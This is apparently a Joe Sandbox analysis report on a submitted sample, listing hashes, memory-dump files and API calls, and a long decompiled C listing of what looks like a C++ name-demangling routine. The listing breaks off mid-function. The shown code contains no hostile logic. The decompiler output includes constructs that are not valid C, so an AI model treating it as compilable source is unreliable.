Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @$w
API String ID: 544645111-2958184939
Opcode ID: 091a494ecf6999f70dec3aa3077766d22ac532a654ce64814f89784293386074
Instruction ID: 8d829cf16dac16c290c77f8cf1b73b043f40aef995980c8ccc118cf79848ad30
Opcode Fuzzy Hash: 091a494ecf6999f70dec3aa3077766d22ac532a654ce64814f89784293386074
Instruction Fuzzy Hash: CC41FB70D092D88EDB11CBFDC446EDEBFF0AF46384F044569D8A4AB25AD2B89508CB11

Uniqueness

Uniqueness Score: -1.00%

Function 013C125C Relevance: 5.1, APIs: 4, Instructions: 89
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 013C12E2
strlen.MSVCRT ref: 013C131B
malloc.MSVCRT ref: 013C1326
memcpy.MSVCRT ref: 013C133C

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: b68e142381f3fac08bdc7a3ff9d46dd77790d2b8f04b5b99c10f2287b9ac5141
Instruction ID: e6ebb5d3d259396f4a25c713e87474b77dd0e84e0597b68e55dd5baef30e9575
Opcode Fuzzy Hash: b68e142381f3fac08bdc7a3ff9d46dd77790d2b8f04b5b99c10f2287b9ac5141
Instruction Fuzzy Hash: 013127B6A04315CFEB20DFA8D480A99BBF2FB48708F14842ECA44E7316E375D955DB81

Uniqueness

Uniqueness Score: -1.00%

Function 013C1299 Relevance: 5.1, APIs: 4, Instructions: 78
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 013C12E2
strlen.MSVCRT ref: 013C131B
malloc.MSVCRT ref: 013C1326
memcpy.MSVCRT ref: 013C133C

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 685f5c9b452b3002f50fc91c1c0d382453c61be6425c4a3d784fd21f55d987bc
Instruction ID: bc06079918dedcb5a64d74589f5427298c5c99c03c185b43e66bbff989edc90c
Opcode Fuzzy Hash: 685f5c9b452b3002f50fc91c1c0d382453c61be6425c4a3d784fd21f55d987bc
Instruction Fuzzy Hash: EB3135B6A04315CFEB20DF68E480A59BBF2FB48708F14842EDA48A7315E374A915DF80

Uniqueness

Uniqueness Score: -1.00%

Function 013C1289 Relevance: 5.1, APIs: 4, Instructions: 75
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 013C12E2
strlen.MSVCRT ref: 013C131B
malloc.MSVCRT ref: 013C1326
memcpy.MSVCRT ref: 013C133C

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 40a48e9d04a3a60f611d7870ea536128ff4f2e02e6fe4c1ba7a6185eb57a2810
Instruction ID: 88992cd6813df09ab442fc1f4ab3f472191cc619f240c59453f5a0d6d99c667c
Opcode Fuzzy Hash: 40a48e9d04a3a60f611d7870ea536128ff4f2e02e6fe4c1ba7a6185eb57a2810
Instruction Fuzzy Hash: 3C3125B6A04315CFDB20DFA8E480A59BBF2FB48708F10852EDA48A7315E770A915DF81

Uniqueness

Uniqueness Score: -1.00%

Function 013CD020 Relevance: 1.6, APIs: 1, Instructions: 330
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E013CD020(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t306;
				void* _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				void* _t316;
				signed int _t318;
				signed int _t323;
				signed char _t341;
				void* _t343;
				void* _t348;
				signed char _t350;
				intOrPtr _t363;
				signed int _t366;
				signed int _t368;
				char* _t373;
				signed int _t374;
				void* _t382;
				signed int* _t383;

				_push(__edi);
				_push(__esi);
				_push(__ebx);
				_t343 = __eax;
				_t383 = _t382 - 0x3c;
				_t373 =  *((intOrPtr*)(__eax + 0xc));
				if(E013CC8E0(_t373, __ecx) != 0) {
					_t306 = E013CEFA0(_t343, 0,  &(_t383[0xb]));
					_t374 = _t306;
					__eflags = _t306;
					if(_t306 == 0) {
						goto L22;
					} else {
						__eflags =  *((char*)( *((intOrPtr*)(_t343 + 0xc)))) - 0x46;
						_t309 = _t343;
						if(__eflags == 0) {
							_t310 = E013CDB50(_t309, __edi);
						} else {
							_t310 = E013CD020(_t309, _t343, 0, __edi, _t374, __eflags);
						}
						 *_t374 = _t310;
						__eflags = _t310;
						if(_t310 == 0) {
							goto L22;
						} else {
							_t348 =  *_t310;
							__eflags = _t348 - 0x1f - 1;
							if(_t348 - 0x1f <= 1) {
								 *(0xc + _t310) = _t383[0xb];
								_t383[0xb] =  *_t374;
								 *_t374 =  *(0xc + _t310);
							}
							_t366 = _t383[0xb];
							__eflags = _t366;
							if(_t366 == 0) {
								goto L22;
							} else {
								_t311 =  *(_t343 + 0x20);
								__eflags = _t311 -  *((intOrPtr*)(_t343 + 0x24));
								if(_t311 >=  *((intOrPtr*)(_t343 + 0x24))) {
									goto L22;
								} else {
									 *( *((intOrPtr*)(_t343 + 0x1c)) + _t311 * 4) = _t366;
									_t312 = _t311 + 1;
									__eflags = _t312;
									 *(_t343 + 0x20) = _t312;
								}
							}
						}
					}
					goto L18;
				} else {
					_t314 =  *_t373;
					if(_t314 > 0x5a) {
						_t4 = _t314 - 0x61; // -97
						_t350 = _t4;
						if(_t350 > 0x19) {
							goto L22;
						} else {
							if((0x00000001 << _t350 & 0x03ec7bff) == 0) {
								__eflags = _t350 - 0x14;
								if(_t350 == 0x14) {
									 *((intOrPtr*)(_t343 + 0xc)) = _t373 + 1;
									_t316 = E013CCCE0(_t343);
									 *_t383 = 0;
									_t318 = E013CC370(_t343, _t316, 0x28);
									_t383[0xb] = _t318;
									_t368 = _t318;
									goto L24;
								} else {
									goto L22;
								}
							} else {
								_t363 = 0x14aaec0 + (_t314 + _t314 * 4 - 0x1e5) * 4;
								_t323 =  *(_t343 + 0x14);
								if(_t323 >=  *((intOrPtr*)(_t343 + 0x18))) {
									goto L117;
								} else {
									_t366 =  *((intOrPtr*)(_t343 + 0x10)) + (_t323 + _t323 * 4) * 4;
									 *(_t366 + 4) = 0;
									 *(_t366 + 8) = 0;
									 *(_t343 + 0x14) = _t323 + 1;
									 *_t366 = 0x27;
									 *((intOrPtr*)(0xc + _t366)) = _t363;
									 *((intOrPtr*)(_t343 + 0x2c)) =  *((intOrPtr*)(_t343 + 0x2c)) +  *((intOrPtr*)(_t363 + 4));
									 *((intOrPtr*)(_t343 + 0xc)) = _t373 + 1;
									goto L18;
								}
							}
						}
					} else {
						if(_t314 <= 0x2f) {
							L22:
							_t366 = 0;
							goto L18;
						} else {
							_t341 = _t314 - 0x30;
							if(_t341 > 0x2a) {
								goto L22;
							} else {
								_t314 = _t341 & 0x000000ff;
								switch( *((intOrPtr*)((_t341 & 0x000000ff) * 4 +  &M014A9B88))) {
									case 0:
										__eax = __ebx;
										__eax = E013CF800(__ebx);
										__esp[0xb] = __eax;
										__edi = __eax;
										goto L24;
									case 1:
										goto L22;
									case 2:
										__edx = __esi + 1;
										 *(0xc + __ebx) = __edx;
										__eax =  *(__esi + 1) & 0x000000ff;
										__eflags = __al - 0x5f;
										if(__eflags == 0) {
											__esi = 0;
											goto L59;
										} else {
											__eax = __eax - 0x30;
											__eflags = __al - 9;
											if(__al > 9) {
												__edi =  *(__ebx + 0x30);
												 *(__ebx + 0x30) = 1;
												__eax = __ebx;
												__eax = E013CE740(__ebx);
												__esi = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													goto L22;
												} else {
													__edi =  *(0xc + __ebx);
													__eax =  *__edi & 0x000000ff;
													goto L58;
												}
											} else {
												__edi = __edx;
												do {
													__ebp = __edi;
													__edi = __edi + 1;
													 *(0xc + __ebx) = __edi;
													 *__edi & 0x000000ff = ( *__edi & 0x000000ff) - 0x30;
													__eflags = __al - 9;
												} while (__al <= 9);
												__ecx = __ebp;
												__eax = __ebx;
												__ecx = __ebp - __esi;
												__eax = E013CC480(__ebx, __ecx, __edx);
												__esi = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													goto L22;
												} else {
													__eax =  *(__ebp + 1) & 0x000000ff;
													L58:
													__edx = __edi;
													__eflags = __al - 0x5f;
													if(__eflags != 0) {
														goto L22;
													} else {
														L59:
														__edx = __edx + 1;
														__eax = __ebx;
														 *(0xc + __ebx) = __edx;
														__eax = E013CD020(__ebx, __ebx, __ecx, __edi, __esi, __eflags);
														__ecx = __esi;
														__edx = 0x2a;
														 *__esp = __eax;
														__eax = __ebx;
														__eax = E013CC370(__ebx, __esi, 0x2a);
														__esp[0xb] = __eax;
														__edi = __eax;
														goto L24;
													}
												}
											}
										}
										goto L134;
									case 3:
										__esi = __esi + 1;
										__eax = __ebx;
										 *(0xc + __ebx) = __esi;
										__eax = E013CD020(__ebx, __ebx, __ecx, __edi, __esi, __eflags);
										 *__esp = 0;
										__edx = 0x25;
										__ecx = __eax;
										__eax = __ebx;
										__eax = E013CC370(__ebx, __ecx, 0x25);
										__esp[0xb] = __eax;
										__edi = __eax;
										goto L24;
									case 4:
										_t50 = __esi + 1; // 0x0
										__eax = _t50;
										 *(0xc + __ebx) = _t50;
										__eflags =  *(__esi + 1);
										if( *(__esi + 1) == 0) {
											goto L22;
										} else {
											_t53 = __esi + 2; // 0x1
											__eax = _t53;
											 *(0xc + __ebx) = _t53;
											 *(__esi + 1) & 0x000000ff = ( *(__esi + 1) & 0x000000ff) - 0x46;
											__eflags = __al - 0x30;
											if(__eflags > 0) {
												goto L22;
											} else {
												__eax = __al & 0x000000ff;
												switch( *((intOrPtr*)((__al & 0x000000ff) * 4 +  &M014A9C34))) {
													case 0:
														goto L67;
													case 1:
														goto L22;
													case 2:
														goto L63;
													case 3:
														goto L76;
													case 4:
														goto L74;
													case 5:
														goto L92;
													case 6:
														goto L88;
													case 7:
														goto L80;
													case 8:
														goto L78;
													case 9:
														goto L99;
													case 0xa:
														goto L96;
													case 0xb:
														goto L98;
													case 0xc:
														goto L90;
													case 0xd:
														goto L94;
													case 0xe:
														goto L82;
												}
											}
										}
										goto L134;
									case 5:
										__eax = __ebx;
										__eax = E013CDB50(__ebx, __edi);
										__esp[0xb] = __eax;
										__edi = __eax;
										goto L24;
									case 6:
										__esi = __esi + 1;
										__eax = __ebx;
										 *(0xc + __ebx) = __esi;
										__eax = E013CD020(__ebx, __ebx, __ecx, __edi, __esi, __eflags);
										 *__esp = 0;
										__edx = 0x26;
										__ecx = __eax;
										__eax = __ebx;
										__eax = E013CC370(__ebx, __ecx, 0x26);
										__esp[0xb] = __eax;
										__edi = __eax;
										goto L24;
									case 7:
										__esi = __esi + 1;
										__eax = __ebx;
										 *(0xc + __ebx) = __esi;
										__eax = E013CD020(__ebx, __ebx, __ecx, __edi, __esi, __eflags);
										__esi = __eax;
										__eflags = __eax;
										if(__eflags == 0) {
											goto L22;
										} else {
											__eax = __ebx;
											__eax = E013CD020(__ebx, __ebx, __ecx, __edi, __esi, __eflags);
											__eflags = __eax;
											if(__eax == 0) {
												goto L22;
											} else {
												 *__esp = __eax;
												__ecx = __esi;
												__edx = 0x2b;
												__eax = __ebx;
												__eax = E013CC370(__ebx, __esi, 0x2b);
												__esp[0xb] = __eax;
												__edi = __eax;
												goto L24;
											}
										}
										goto L134;
									case 8:
										__esi = __esi + 1;
										__eax = __ebx;
										 *(0xc + __ebx) = __esi;
										__eax = E013CD020(__ebx, __ebx, __ecx, __edi, __esi, __eflags);
										 *__esp = 0;
										__edx = 0x24;
										__ecx = __eax;
										__eax = __ebx;
										__eax = E013CC370(__ebx, __ecx, 0x24);
										__esp[0xb] = __eax;
										__edi = __eax;
										goto L24;
									case 9:
										__esi = __esi + 1;
										__eax = __ebx;
										 *(0xc + __ebx) = __esi;
										__eax = E013CD020(__ebx, __ebx, __ecx, __edi, __esi, __eflags);
										 *__esp = 0;
										__edx = 0x22;
										__ecx = __eax;
										__eax = __ebx;
										__eax = E013CC370(__ebx, __ecx, 0x22);
										__esp[0xb] = __eax;
										__edi = __eax;
										goto L24;
									case 0xa:
										__esi = __esi + 1;
										__eax = __ebx;
										 *(0xc + __ebx) = __esi;
										__eax = E013CD020(__ebx, __ebx, __ecx, __edi, __esi, __eflags);
										 *__esp = 0;
										__edx = 0x23;
										__ecx = __eax;
										__eax = __ebx;
										__eax = E013CC370(__ebx, __ecx, 0x23);
										__esp[0xb] = __eax;
										__edi = __eax;
										goto L24;
									case 0xb:
										__eax =  *(__esi + 1) & 0x000000ff;
										__edx = __eax - 0x30;
										__eflags = __dl - 9;
										if(__dl <= 9) {
											L44:
											__edx = 0;
											__eax = __ebx;
											__eax = E013CCDF0(__ebx, 0);
											__esp[0xb] = __eax;
											__edi = __eax;
											__eax =  *(0xc + __ebx);
											__eflags =  *__eax - 0x49;
											if( *__eax != 0x49) {
												goto L18;
											} else {
												 *(0xc + __ebx) = __eax;
												__eax = __ebx;
												 *__esp = E013CE500(__ebx, __ebp);
												goto L40;
											}
										} else {
											__eflags = __al - 0x5f;
											if(__al == 0x5f) {
												goto L44;
											} else {
												__eax = __eax - 0x41;
												__eflags = __al - 0x19;
												if(__al > 0x19) {
													__eax = __ebx;
													__eax = E013CF800(__ebx);
													__esp[0xb] = __eax;
													__edi = __eax;
													__eflags = __eax;
													if(__eax == 0) {
														goto L22;
													} else {
														__eflags =  *__eax - 0x18;
														if( *__eax != 0x18) {
															goto L25;
														} else {
															goto L18;
														}
													}
												} else {
													goto L44;
												}
											}
										}
										goto L134;
									case 0xc:
										__eax = __ebx;
										__eax = E013CCBA0(__ebx);
										__ebp =  *(0xc + __ebx);
										__esp[0xb] = __eax;
										__edi = __eax;
										__eflags =  *__ebp - 0x49;
										if( *__ebp != 0x49) {
											goto L24;
										} else {
											__edx =  *(__ebx + 0x34);
											__eflags =  *(__ebx + 0x34);
											if( *(__ebx + 0x34) != 0) {
												__eax =  *(__ebx + 0x14);
												__esi =  *(__ebx + 0x2c);
												__esp[7] =  *(__ebx + 0x14);
												__eax =  *(__ebx + 0x20);
												__esp[6] =  *(__ebx + 0x20);
												__eax = __ebp + 1;
												 *(0xc + __ebx) = __ebp + 1;
												__eax = __ebx;
												__edx = E013CE500(__ebx, __ebp);
												__eax =  *(0xc + __ebx);
												__eflags =  *( *(0xc + __ebx)) - 0x49;
												if( *( *(0xc + __ebx)) == 0x49) {
													__eflags = __edi;
													if(__edi == 0) {
														goto L22;
													} else {
														__eax =  *(__ebx + 0x20);
														__eflags = __eax -  *((intOrPtr*)(__ebx + 0x24));
														if(__eax >=  *((intOrPtr*)(__ebx + 0x24))) {
															goto L22;
														} else {
															__ecx =  *(__ebx + 0x1c);
															 *( *(__ebx + 0x1c) + __eax * 4) = __edi;
															 *(__ebx + 0x20) = __eax;
															 *__esp = __edx;
															goto L40;
														}
													}
												} else {
													__eax = __esp[7];
													 *(0xc + __ebx) = __ebp;
													 *(__ebx + 0x2c) = __esi;
													 *(__ebx + 0x14) = __esp[7];
													__eax = __esp[6];
													 *(__ebx + 0x20) = __esp[6];
													goto L24;
												}
											} else {
												__eflags = __eax;
												if(__eax == 0) {
													goto L22;
												} else {
													__eax =  *(__ebx + 0x20);
													__eflags = __eax -  *((intOrPtr*)(__ebx + 0x24));
													if(__eax >=  *((intOrPtr*)(__ebx + 0x24))) {
														goto L22;
													} else {
														__esi =  *(__ebx + 0x1c);
														 *( *(__ebx + 0x1c) + __eax * 4) = __edi;
														__eax = __eax + 1;
														__esi = 0;
														 *(__ebx + 0x20) = __eax;
														 *__ebp & 0x000000ff = ( *__ebp & 0x000000ff) - 0x49;
														__eflags = __al - 1;
														if(__al <= 1) {
															__edx = __ebp + 1;
															__eax = __ebx;
															 *(0xc + __ebx) = __ebp + 1;
															__esi = E013CE500(__ebx, __ebp);
														}
														 *__esp = __esi;
														L40:
														__ecx = __edi;
														__edx = 4;
														__eax = __ebx;
														__eax = E013CC370(__ebx, __edi, 4);
														__esp[0xb] = __eax;
														__edi = __eax;
														goto L24;
													}
												}
											}
										}
										goto L134;
									case 0xd:
										__esi = __esi + 1;
										__eax = __ebx;
										 *(0xc + __ebx) = __esi;
										__eax = E013CCCE0(__ebx);
										__esp[0xb] = __eax;
										__esi = __eax;
										__eax =  *(0xc + __ebx);
										__eflags =  *__eax - 0x49;
										if(__eflags == 0) {
											 *(0xc + __ebx) = __eax;
											__eax = __ebx;
											__eax = E013CE500(__ebx, __ebp);
											__ecx = __esi;
											__edx = 4;
											 *__esp = __eax;
											__eax = __ebx;
											__esi = E013CC370(__ebx, __ecx, 4);
										}
										__eax = __ebx;
										__eax = E013CD020(__ebx, __ebx, __ecx, __edi, __esi, __eflags);
										 *__esp = __esi;
										__edx = 0x21;
										__ecx = __eax;
										__eax = __ebx;
										__eax = E013CC370(__ebx, __ecx, 0x21);
										__esp[0xb] = __eax;
										__edi = __eax;
										goto L24;
									case 0xe:
										L67:
										__eax =  *(__ebx + 0x14);
										__eflags = __eax -  *((intOrPtr*)(__ebx + 0x18));
										if(__eax >=  *((intOrPtr*)(__ebx + 0x18))) {
											goto L119;
										} else {
											__edx =  *(__ebx + 0x10);
											__ecx = __eax + __eax * 4;
											__eax = __eax + 1;
											__edi =  *(__ebx + 0x10) + __ecx * 4;
											 *(__edi + 4) = 0;
											 *(__edi + 8) = 0;
											 *(__ebx + 0x14) = __eax;
											 *__edi = 0x2c;
											__eax =  *(__esi + 2) & 0x000000ff;
											__esp[0xb] = __edi;
											__eax = ( *(__esi + 2) & 0x000000ff) - 0x30;
											__eflags = __al - 9;
											_t118 = __al - 9 < 0;
											__eflags = _t118;
											( *(__esi + 2) & 0x000000ff) - 0x00000030 & 0xffffff00 | _t118 = __al & 0x000000ff;
											 *(__edi + 0x10) = __ax;
											if(__eflags <= 0) {
												__ebx = E013CC4E0(__ebx);
											}
											__eax = __ebx;
											__eax = E013CD020(__ebx, __ebx, __ecx, __edi, __esi, __eflags);
											 *(0xc + __edi) = __eax;
											__eflags = __eax;
											if(__eax == 0) {
												goto L22;
											} else {
												__ebx = E013CC4E0(__ebx);
												__edx =  *(0xc + __ebx);
												__eax =  *__edx & 0x000000ff;
												__eflags = __al;
												if(__al != 0) {
													_t122 = __edx + 1; // 0x1
													__eax = _t122;
													 *(0xc + __ebx) = _t122;
													__eax =  *__edx & 0x000000ff;
												}
												__eflags = __al - 0x73;
												__eax = __al & 0x000000ff;
												 *(__edi + 0x12) = __ax;
											}
											goto L18;
										}
										goto L134;
									case 0xf:
										L63:
										__esi =  *(__ebx + 0x30);
										 *(__ebx + 0x30) = 1;
										__eax = __ebx;
										__eax = E013CE740(__ebx);
										__edx = 0x44;
										 *__esp = 0;
										__ecx = __eax;
										__eax = __ebx;
										__eax = E013CC370(__ebx, __ecx, 0x44);
										__esp[0xb] = __eax;
										__edi = __eax;
										__eflags = __eax;
										if(__eax == 0) {
											goto L22;
										} else {
											__eax =  *(0xc + __ebx);
											__eflags =  *__eax;
											if( *__eax == 0) {
												goto L22;
											} else {
												_t103 = __eax + 1; // 0x1
												__edx = _t103;
												 *(0xc + __ebx) = _t103;
												__eflags =  *__eax - 0x45;
												if( *__eax == 0x45) {
													goto L25;
												} else {
													__edi = 0;
													goto L18;
												}
											}
										}
										goto L134;
									case 0x10:
										L76:
										__eax =  *(__ebx + 0x14);
										__eflags = __eax -  *((intOrPtr*)(__ebx + 0x18));
										if(__eax >=  *((intOrPtr*)(__ebx + 0x18))) {
											goto L22;
										} else {
											__edx =  *(__ebx + 0x10);
											__ecx = __eax + __eax * 4;
											 *(__ebx + 0x14) = __eax;
											__edi =  *(__ebx + 0x10) + __ecx * 4;
											 *(__edi + 4) = 0;
											 *(__edi + 8) = 0;
											 *__edi = 0;
											 *(0xc + __edi) = "auto";
											 *(__edi + 0x10) = 4;
										}
										goto L18;
									case 0x11:
										L74:
										__eax =  *(__ebx + 0x14);
										__eflags = __eax -  *((intOrPtr*)(__ebx + 0x18));
										if(__eax >=  *((intOrPtr*)(__ebx + 0x18))) {
											goto L22;
										} else {
											__edx =  *(__ebx + 0x10);
											__ecx = __eax + __eax * 4;
											 *(__ebx + 0x14) = __eax;
											__edi =  *(__ebx + 0x10) + __ecx * 4;
											 *(__edi + 4) = 0;
											 *(__edi + 8) = 0;
											 *__edi = 0;
											 *(0xc + __edi) = "decltype(auto)";
											 *(__edi + 0x10) = 0xe;
										}
										goto L18;
									case 0x12:
										L92:
										__eax =  *(__ebx + 0x14);
										__eflags = __eax -  *((intOrPtr*)(__ebx + 0x18));
										if(__eax >=  *((intOrPtr*)(__ebx + 0x18))) {
											goto L116;
										} else {
											__edx =  *(__ebx + 0x10);
											__ecx = __eax + __eax * 4;
											__eax = __eax + 1;
											__edi =  *(__ebx + 0x10) + __ecx * 4;
											 *(__edi + 4) = 0;
											 *(__edi + 8) = 0;
											 *(__ebx + 0x14) = __eax;
											 *__edi = 0x27;
											 *(0xc + __edi) = 0x14ab0dc;
											 *(__ebx + 0x2c) =  *(__ebx + 0x2c) + 9;
											goto L18;
										}
										goto L134;
									case 0x13:
										L88:
										__eax =  *(__ebx + 0x14);
										__eflags = __eax -  *((intOrPtr*)(__ebx + 0x18));
										if(__eax >=  *((intOrPtr*)(__ebx + 0x18))) {
											goto L123;
										} else {
											__edx =  *(__ebx + 0x10);
											__ecx = __eax + __eax * 4;
											__eax = __eax + 1;
											__edi =  *(__ebx + 0x10) + __ecx * 4;
											 *(__edi + 4) = 0;
											 *(__edi + 8) = 0;
											 *(__ebx + 0x14) = __eax;
											 *__edi = 0x27;
											 *(0xc + __edi) = 0x14ab0f0;
											 *(__ebx + 0x2c) =  *(__ebx + 0x2c) + 0xa;
											goto L18;
										}
										goto L134;
									case 0x14:
										L80:
										__eax =  *(__ebx + 0x14);
										__eflags = __eax -  *((intOrPtr*)(__ebx + 0x18));
										if(__eax >=  *((intOrPtr*)(__ebx + 0x18))) {
											__eax =  *0xc;
											asm("ud2");
											L116:
											__eax =  *0xc;
											asm("ud2");
											L117:
											asm("ud2");
											goto L118;
										} else {
											__edx =  *(__ebx + 0x10);
											__ecx = __eax + __eax * 4;
											__eax = __eax + 1;
											__edi =  *(__ebx + 0x10) + __ecx * 4;
											 *(__edi + 4) = 0;
											 *(__edi + 8) = 0;
											 *(__ebx + 0x14) = __eax;
											 *__edi = 0x27;
											 *(0xc + __edi) = 0x14ab0c8;
											 *(__ebx + 0x2c) =  *(__ebx + 0x2c) + 9;
											goto L18;
										}
										goto L134;
									case 0x15:
										L78:
										__eax =  *(__ebx + 0x14);
										__eflags = __eax -  *((intOrPtr*)(__ebx + 0x18));
										if(__eax >=  *((intOrPtr*)(__ebx + 0x18))) {
											goto L120;
										} else {
											__edx =  *(__ebx + 0x10);
											__ecx = __eax + __eax * 4;
											__eax = __eax + 1;
											__edi =  *(__ebx + 0x10) + __ecx * 4;
											 *(__edi + 4) = 0;
											 *(__edi + 8) = 0;
											 *(__ebx + 0x14) = __eax;
											 *__edi = 0x27;
											 *(0xc + __edi) = 0x14ab104;
											 *(__ebx + 0x2c) =  *(__ebx + 0x2c) + 4;
											goto L18;
										}
										goto L134;
									case 0x16:
										L99:
										__eax =  *(__ebx + 0x14);
										__eflags = __eax -  *((intOrPtr*)(__ebx + 0x18));
										if(__eax >=  *((intOrPtr*)(__ebx + 0x18))) {
											goto L122;
										} else {
											__edx =  *(__ebx + 0x10);
											__ecx = __eax + __eax * 4;
											__eax = __eax + 1;
											__edi =  *(__ebx + 0x10) + __ecx * 4;
											 *(__edi + 4) = 0;
											 *(__edi + 8) = 0;
											 *(__ebx + 0x14) = __eax;
											 *__edi = 0x27;
											 *(0xc + __edi) = 0x14ab140;
											 *(__ebx + 0x2c) =  *(__ebx + 0x2c) + 8;
											goto L18;
										}
										goto L134;
									case 0x17:
										L96:
										__eax =  *(__ebx + 0x14);
										__eflags = __eax -  *((intOrPtr*)(__ebx + 0x18));
										if(__eax >=  *((intOrPtr*)(__ebx + 0x18))) {
											goto L124;
										} else {
											__edx =  *(__ebx + 0x10);
											__ecx = __eax + __eax * 4;
											__eax = __eax + 1;
											__edi =  *(__ebx + 0x10) + __ecx * 4;
											 *(__edi + 4) = 0;
											 *(__edi + 8) = 0;
											 *(__ebx + 0x14) = __eax;
											 *__edi = 0x27;
											 *(0xc + __edi) = 0x14ab154;
											 *(__ebx + 0x2c) =  *(__ebx + 0x2c) + 0x11;
											goto L18;
										}
										goto L134;
									case 0x18:
										L98:
										__eax = __ebx;
										__eax = E013CD020(__ebx, __ebx, __ecx, __edi, __esi, __eflags);
										 *__esp = 0;
										__edx = 0x4c;
										__ecx = __eax;
										__eax = __ebx;
										__eax = E013CC370(__ebx, __ecx, 0x4c);
										__esp[0xb] = __eax;
										__edi = __eax;
										goto L24;
									case 0x19:
										L90:
										__eax =  *(__ebx + 0x14);
										__eflags = __eax -  *((intOrPtr*)(__ebx + 0x18));
										if(__eax >=  *((intOrPtr*)(__ebx + 0x18))) {
											L118:
											asm("ud2");
											L119:
											 *0 = 0;
											asm("ud2");
											L120:
											asm("ud2");
											goto L121;
										} else {
											__edx =  *(__ebx + 0x10);
											__ecx = __eax + __eax * 4;
											__eax = __eax + 1;
											__edi =  *(__ebx + 0x10) + __ecx * 4;
											 *(__edi + 4) = 0;
											 *(__edi + 8) = 0;
											 *(__ebx + 0x14) = __eax;
											 *__edi = 0x27;
											 *(0xc + __edi) = 0x14ab12c;
											 *(__ebx + 0x2c) =  *(__ebx + 0x2c) + 8;
											goto L18;
										}
										goto L134;
									case 0x1a:
										L94:
										__eax =  *(__ebx + 0x14);
										__eflags = __eax -  *((intOrPtr*)(__ebx + 0x18));
										if(__eax >=  *((intOrPtr*)(__ebx + 0x18))) {
											L121:
											asm("ud2");
											L122:
											asm("ud2");
											L123:
											asm("ud2");
											L124:
											asm("ud2");
											E013E75D0();
											E013E7600();
											E013E7600();
											E013E75D0();
											_t386 = _t383 - 0x1c;
											_t352 =  *0x14a31d0; // 0x2
											__eflags = _t352;
											if(_t352 != 0) {
												 *_t386 = 0x14a35d0;
												E013D6430();
											}
											 *_t386 = 0x4a00;
											 *0x14a35e0 = 0x4a00; // executed
											_t337 = malloc(??); // executed
											 *0x14a35dc = _t337;
											__eflags = _t337;
											if(_t337 == 0) {
												 *0x14a35e0 = 0;
											} else {
												 *_t337 = 0x4a00;
												 *(_t337 + 4) = 0;
											}
											 *_t386 = 0x1478710;
											 *0x14a35d8 = _t337;
											return E013C14A0();
										} else {
											__edx =  *(__ebx + 0x10);
											__ecx = __eax + __eax * 4;
											__eax = __eax + 1;
											__edi =  *(__ebx + 0x10) + __ecx * 4;
											 *(__edi + 4) = 0;
											 *(__edi + 8) = 0;
